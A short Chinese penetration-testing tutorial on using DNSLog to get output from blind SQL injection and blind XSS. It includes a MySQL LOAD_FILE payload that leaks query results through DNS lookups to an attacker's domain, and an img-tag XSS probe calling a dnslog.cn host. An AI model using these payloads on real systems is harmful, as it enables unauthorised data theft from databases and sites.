目录

​DNSLog ​

​SQL盲注回显​

​无回显的XSS​

​更多盲打Payload​



在渗透测试中,当我们碰到无回显的漏洞是非常难利用的。一是我们不知道存不存在漏洞,二是我们不知道漏洞执行的结果。因此,针对无回显的漏洞,我们可以通过使用DNSLog来进行回显。DNSLog是一种回显机制,攻击者可以通过DNS的解析日志来读取漏洞执行的回显结果。  


DNSLog

首先,我们都知道DNS的解析过程,递归查询和迭代查询相结合,传送门:​​DNS解析过程 ​

这里我们可以控制的是域名的DNS服务器,也就是如下的 "baidu.com" 的DNS服务器。我们只需要搭建一个的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。

使用DNSLog进行盲打_dns服务器

DNSLog部署过程:

  • 申请一个域名,如 xie.com
  • 在我们的VPS上安装并配置DNS服务器
  • 将 xie.com 的DNS服务器设置为我们的VPS地址
  • 这样,所有访问 xie.com 的二级三级四级等等子域名都会被解析到我们的VPS上。我们就可以通过查询DNS解析记录来获得命令执行的回显了。

SQL盲注回显

不管是布尔类型盲注还是时间盲注,都需要发送大量的数据包去判断数据,而这很可能会触发WAF的防护,因此导致被封IP。所以,如果条件允许,我们可以结合DNSlog来快速的回显数据。MySQL数据库,通过DNSlog盲注需要用到 load_file() 函数,该函数不仅能加载本地文件,同时也能对URL发起请求。因为需要使用 load_file() 函数,所以需要root权限,并且 secure_file_priv 需要为空。传送门:​​MySQL数据库中的文件操作函数(load_file()、into outfile、into dumpfile)​

Payload如下:

SELECT LOAD_FILE(CONCAT('\\\\',(要查询的语句),'.xx.xx.xx\\abc'));

执行的语句 

使用DNSLog进行盲打_dns服务器_02

DNSLog平台收到的DNS查询

使用DNSLog进行盲打_子域名_03

无回显的XSS

payload

<img src=http://hf8r67.dnslog.cn>

DNSLog平台收到的DNS查询

即可证明存在XSS

使用DNSLog进行盲打_dns服务器_04

更多盲打Payload

更多漏洞的Payload,查看ceye的后台,

使用DNSLog进行盲打_子域名_05

使用DNSLog进行盲打_dns服务器_06

使用DNSLog进行盲打_数据库_07